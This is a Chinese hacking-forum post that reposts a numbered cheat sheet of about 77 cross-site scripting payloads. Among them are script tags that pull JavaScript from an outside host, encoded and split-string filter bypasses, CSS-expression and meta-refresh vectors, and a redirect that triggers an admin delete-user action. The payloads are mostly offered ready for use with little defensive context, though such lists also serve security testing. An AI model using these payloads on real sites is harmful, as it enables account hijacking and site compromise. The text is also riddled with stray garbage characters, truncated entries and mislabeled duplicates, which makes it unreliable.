貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。1 e& ^, G6 q: u" Z( i
(1)普通的XSS JavaScript注入- P2 K3 M' Y6 u8 q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* ^" X( N: p& c& Z5 _8 o3 g(2)IMG标签XSS使用JavaScript命令, R* j: n/ x: U9 R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 D& ] S8 ^: Z; s(3)IMG标签无分号无引号 V1 G0 A8 R; B* _3 M4 K
<IMG SRC=javascript:alert(‘XSS’)>, s2 l5 c- ?' c5 y9 t( @0 s
(4)IMG标签大小写不敏感, c8 e$ y# n# M' z
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>- e, o- `1 z1 I0 U
(5)HTML编码(必须有分号)6 M% G4 N. p$ J
<IMG SRC=javascript:alert(“XSS”)>- x& e0 @$ @/ v. h! G
(6)修正缺陷IMG标签; m6 V# C4 i, T- C* k
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
. W, Z( s% `2 y7 G3 W& I$ Q1 I
( S+ d% `& e/ S/ k; W4 K% V2 ]- g7 i
(7)formCharCode标签(计算器)- R+ S) w- D# D7 N+ X0 }1 Q( M
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- F# C% V6 g/ G3 h(8)UTF-8的Unicode编码(计算器)
4 u, U$ [! s+ }2 z<IMG SRC=jav..省略..S')>
" z' C7 J6 H& |/ Z0 {' _(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ W; v+ q" L2 m# ^9 ]* I
<IMG SRC=jav..省略..S')>2 g% [" l8 _) l' T, ^, T
(10)十六进制编码也是没有分号(计算器)# q+ {* j/ a5 A/ M/ C C
<IMG SRC=java..省略..XSS')>
: b1 m- `0 N+ v# ~6 i* A/ m6 I! q(11)嵌入式标签,将Javascript分开
) a# [# d0 j7 A3 ?/ Z6 e$ M<IMG SRC=”jav ascript:alert(‘XSS’);”>9 E* O( M7 e B% k9 @* D, N
(12)嵌入式编码标签,将Javascript分开
) e0 x1 k+ f& Q/ p<IMG SRC=”jav ascript:alert(‘XSS’);”>6 V! G, C) J) T" Q% W! C
(13)嵌入式换行符/ O" K4 e2 ]1 T( H9 g
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" r* h3 Z, X1 P* W, x' F1 E3 @(14)嵌入式回车
1 F: T/ p* G# R$ j4 e<IMG SRC=”jav ascript:alert(‘XSS’);”>/ Y. Q3 z$ F; W- N% c9 V
(15)嵌入式多行注入JavaScript,这是XSS极端的例子2 V- L$ n; J* l% I6 t: J0 u
<IMG SRC=”javascript:alert(‘XSS‘)”>
& r2 m+ F5 Z5 j7 p8 e* F* m(16)解决限制字符(要求同页面)
5 t, R5 M) a1 `3 w ^# v<script>z=’document.’</script>
0 P( b* x& T4 n% N- A<script>z=z+’write(“‘</script>$ D6 ]0 H! }8 T$ {
<script>z=z+’<script’</script>) @/ p! Z7 o1 k; H6 j, g4 S
<script>z=z+’ src=ht’</script>
; O2 w- a) n6 g9 Y3 T7 o% g" n/ B<script>z=z+’tp://ww’</script>
0 L$ ~+ w9 V3 }: ^9 l7 q<script>z=z+’w.shell’</script>
; c/ B2 z2 D8 O1 U2 B/ A3 m) ~<script>z=z+’.net/1.’</script>
' T' N& w% H9 z8 x' g6 T- m( J<script>z=z+’js></sc’</script>4 k: ?9 P# }) m
<script>z=z+’ript>”)’</script>
( h! @% e a |+ T1 U; [<script>eval_r(z)</script>; }& ~7 D& }7 K- ~% y" R
(17)空字符12-7-1 T00LS - Powered by Discuz! Board/ T- s, k* D& l
https://www.t00ls.net/viewthread ... table&tid=15267 2/64 d/ I E# j* b5 e# h0 d
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out% a+ O4 F0 \% V
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
2 i: t% r: y/ Tperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out. ]6 z! `% d {2 b( u
(19)Spaces和meta前的IMG标签
& g: Z6 D- S+ m2 c<IMG SRC=” javascript:alert(‘XSS’);”>
* Q3 T* h! F( n# F i(20)Non-alpha-non-digit XSS
. G) J r# g7 K% M3 J<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% H& k' S$ @& H, o% \(21)Non-alpha-non-digit XSS to 2: w/ g% t: ^! l
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>' u0 o2 r( G& ]
(22)Non-alpha-non-digit XSS to 3
- w5 n& c$ J8 q<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 F: R& F' M$ d1 X% [1 \(23)双开括号# z7 U3 {7 w! v! H; }0 s. ^3 l/ ~. n
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
9 O4 r3 [! _7 p* P6 u(24)无结束脚本标记(仅火狐等浏览器)/ l5 e/ v) ?9 D! ~% \
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>& @, H) G5 F+ D! [. z3 n! W
(25)无结束脚本标记23 a- W7 s7 H) f5 l2 h; g
<SCRIPT SRC=//3w.org/XSS/xss.js>& K0 L* m% h* m6 D1 v; Z
(26)半开的HTML/JavaScript XSS. x% x! t- J' E( m8 @! c
<IMG SRC=”javascript:alert(‘XSS’)”
- ?) W9 @6 M8 d(27)双开角括号& S$ K. o% q0 c' Y: j
<iframe src=http://3w.org/XSS.html <3 i# y* o @" z/ Q2 O8 d2 \
(28)无单引号 双引号 分号 ]" n8 m: O) s+ a, K! ]% _8 a
<SCRIPT>a=/XSS/8 X% N. M) n% F: D9 j8 e& _
alert(a.source)</SCRIPT>
, \/ `7 u1 [) g) x+ U3 V: K(29)换码过滤的JavaScript% ]( B! O4 V" D9 N( `. x" D
\”;alert(‘XSS’);//
4 V4 ?! U& f7 ? n(30)结束Title标签# S2 o: y( }0 k- k) {- v& j
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& K \! g% b2 Z0 E(31)Input Image- `. M9 p# ~: Q) T; A" C
<INPUT SRC=”javascript:alert(‘XSS’);”>
1 u) Q( b, F0 ]0 X- Y/ M(32)BODY Image
! ]( D) f7 v2 i9 F" K" O<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
0 _: V- U9 _4 H! z' U7 }(33)BODY标签
" r( U8 T- X( E' U! h5 O* m<BODY(‘XSS’)>
0 h0 G/ K7 E X( i/ }6 Z(34)IMG Dynsrc
) m8 R- `1 X, v<IMG DYNSRC=”javascript:alert(‘XSS’)”>
- c2 F! e: f0 D( C6 T3 K" S" H: y(35)IMG Lowsrc
( d f* T( D! J<IMG LOWSRC=”javascript:alert(‘XSS’)”>. |$ Q6 g3 l1 N& H" S
(36)BGSOUND
% N# G- s/ A- f% g! q, q<BGSOUND SRC=”javascript:alert(‘XSS’);”>4 k8 x, G. G. N' |. J! m" C
(37)STYLE sheet8 \4 }; {, b* j( P; n% C. ?
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 e9 S1 f/ y0 g, i(38)远程样式表
! S" q! e# B, q3 z- }<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>* q J# R% C w) `! [
(39)List-style-image(列表式)
9 E7 c7 C7 Q s<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS# n& G2 R" C4 F
(40)IMG VBscript
0 b9 D' \' F4 B. h% Q# n<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS" C% k( R, Y* e* i5 _1 B+ _
(41)META链接url
3 x1 a0 V0 F7 b) b8 t O; i. U4 q2 t, S. W& H6 N
6 N: C/ m" t4 |; M) {( Z
<META HTTP-EQUIV=”refresh” CONTENT=”0;
7 @4 s$ B+ K/ c' U* h9 sURL=http://;URL=javascript:alert(‘XSS’);”>
" l8 |; r/ a& G3 ]% \3 X- _5 O! a(42)Iframe
2 B* U8 l; h, l6 f, u' x$ K<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>4 q* K+ G! `. [9 h# ^
(43)Frame. S) q$ r# \8 y, C! C+ j& N
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
$ Y% [4 B8 q2 H2 a8 W. h( Shttps://www.t00ls.net/viewthread ... table&tid=15267 3/6& P/ S- Y) Q7 Y& t1 }; a/ f* T3 P3 g% o
(44)Table
3 Z6 \. N& ~0 C! W4 z<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 }- V, _5 n( W5 @. |; M. N. V) D
(45)TD0 r* P: s6 Q$ z4 v/ Y3 P3 k
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
* N! B, }- o$ p' {: P* V, t(46)DIV background-image
( E- A$ W0 J! }6 V5 M9 X<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; j, R3 z# S L: }(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-! t9 E) L* V6 r# z
8&13&12288&65279) F3 F, A0 E( Q! V# P, O8 ?
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 g- S. F4 D: [' X6 n; G8 w(48)DIV expression$ l. i, c4 Y* t) r0 e% S$ j
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& }; x: c7 B$ k5 K" o$ @7 h
(49)STYLE属性分拆表达
* z2 u" ~" f2 Y; s( Y8 N<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 t" B$ @; Q) Z4 B) {- L5 i2 j
(50)匿名STYLE(组成:开角号和一个字母开头)
5 P, g7 J h( w% h<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>+ Q3 ~; {; F1 p$ H- U9 Q% d
(51)STYLE background-image
7 _ u2 ^2 Y" n/ C' B<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
& w/ Q) ]+ g. ]( ~3 I9 P g" `9 p+ ?CLASS=XSS></A>
6 G/ \, C' F2 U- O(52)IMG STYLE方式
+ F0 b* ]( c# j# h6 rexppression(alert(“XSS”))’>
1 I8 V" L2 a- [; X' m(53)STYLE background% j0 a% w: o3 L
<STYLE><STYLE
1 j" l+ {0 B* x+ A& n) v% S3 Ftype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
; X$ x( A6 a0 }! g+ q1 d8 [(54)BASE
+ |* F) P/ r! l& y' R<BASE HREF=”javascript:alert(‘XSS’);//”>: l; I) j6 F' |! M6 `" ^
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
& _# W( I0 f7 K$ [" N$ k& v- J<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>5 n' h5 O# v. R9 M8 H g
(56)在flash中使用ActionScrpt可以混进你XSS的代码
0 |6 X2 x$ R( M0 za=”get”;
% J1 d! `8 Y6 Q6 Tb=”URL(\”";2 P& q. ~: K( s! A- o) G
c=”javascript:”;# d. v& X$ v/ ^6 F6 Q. O
d=”alert(‘XSS’);\”)”;; h9 J8 i/ m, I- u, ~0 d& I' X
eval_r(a+b+c+d);1 T! E' T V; A1 P4 ]/ C
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上- X& K, k D1 T0 O1 E) z
<HTML xmlns:xss>
% K# O3 t4 F1 w( X% J<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
0 U" }2 S' v5 E9 r' Q$ j8 u l<xss:xss>XSS</xss:xss>3 ], Z. i* C; q9 U# h
</HTML>
0 G2 k! [# f+ L$ O, g, h3 p(58)如果过滤了你的JS你可以在图片里添加JS代码来利用# F8 d; R" p7 H6 U
<SCRIPT SRC=””></SCRIPT>+ Z9 n" _' O) f! w/ A8 W
(59)IMG嵌入式命令,可执行任意命令' ~! Y0 D9 ?& z0 |" d2 e% h# o
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
6 n3 u$ F4 P" f1 F& G' i4 v( k(60)IMG嵌入式命令(a.jpg在同服务器)
' F; l0 e2 S" Y+ H1 H6 o# Z. @Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
+ R( u w0 S& F! E4 S+ r(61)绕符号过滤
( o" z6 X6 b1 l2 q; _4 ~<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>2 W# ? ] p7 R1 e0 o/ b
(62)! y7 j6 @% l7 B. Q5 V" m% k
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>, W# C. Y! L4 X" m i3 C [$ p
(63)
# a& L! e4 J5 g3 n6 X) V5 m! ~$ ]2 l. c<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 d3 F( }. G' r) m* L, j+ G; v
(64); y$ N+ b2 P/ {9 G
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>; c1 x1 l* L( [5 m) e
(65)2 a; t! N5 m0 A4 I4 z
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( t( o$ ]$ }7 J" [, p+ M(66)12-7-1 T00LS - Powered by Discuz! Board' q. C' Z( b' n( ?: `8 q1 R
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
5 J6 S, ?9 `+ O7 o' r B<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>$ U* Y) t, ^& B, X4 g# ^
(67)' R7 W3 C3 A2 S n
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
( q( D& ~% z2 T5 T0 [) G</SCRIPT>4 E" u3 H+ o, i3 v( C+ y5 l9 Y6 _
(68)URL绕行
9 R1 L4 ]$ _7 E+ p/ ~<A HREF=”http://127.0.0.1/”>XSS</A>3 h0 p0 N+ C1 h4 L( o1 D( D' I# u
(69)URL编码$ K6 J1 B% J. M
<A HREF=”http://3w.org”>XSS</A>
6 l8 |- V q" e3 P$ A; G(70)IP十进制& z" n8 k, d4 S0 g5 h# C
<A HREF=”http://3232235521″>XSS</A># y6 N+ D9 c! }( \4 a# z
(71)IP十六进制
0 z1 v& W, X9 w s<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
A8 _ @3 b! R) r(72)IP八进制
' P+ D: q6 s! G4 Z* R. y<A HREF=”http://0300.0250.0000.0001″>XSS</A>) }& L/ v: k5 Z+ C+ z N, t' N
(73)混合编码
& S- |3 M8 v+ Z<A HREF=”h5 A; K; r9 I& B' j3 W
tt p://6 6.000146.0×7.147/”">XSS</A>+ B G' d! b$ @ ^
(74)节省[http:]6 a4 |9 ]/ l8 `" _" u% F
<A HREF=”//www.google.com/”>XSS</A>7 k6 R+ k" _- j. x: n, E3 i9 v& w# \
(75)节省[www]
% Z7 a6 A0 D4 I, _- C4 q<A HREF=”http://google.com/”>XSS</A>$ J# X" u E% \; x; c. ]# T
(76)绝对点绝对DNS( x/ @, g! V( j4 W( o
<A HREF=”http://www.google.com./”>XSS</A>* o4 p5 U! H6 }6 B1 V0 g
(77)javascript链接
% K7 W% o' r* ]6 O$ @! x<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>' M. [/ B6 r! z2 H
9 p, B! G7 j2 l: s' o, E" C; l
原文地址:http://fuzzexp.org/u/0day/?p=14
# k4 G; b6 x8 W/ B/ R% C6 A: Z* p7 k# N; L- w. D. D2 K8 W
|
发表于 2013-4-19 19:22:37
收藏
支持
反对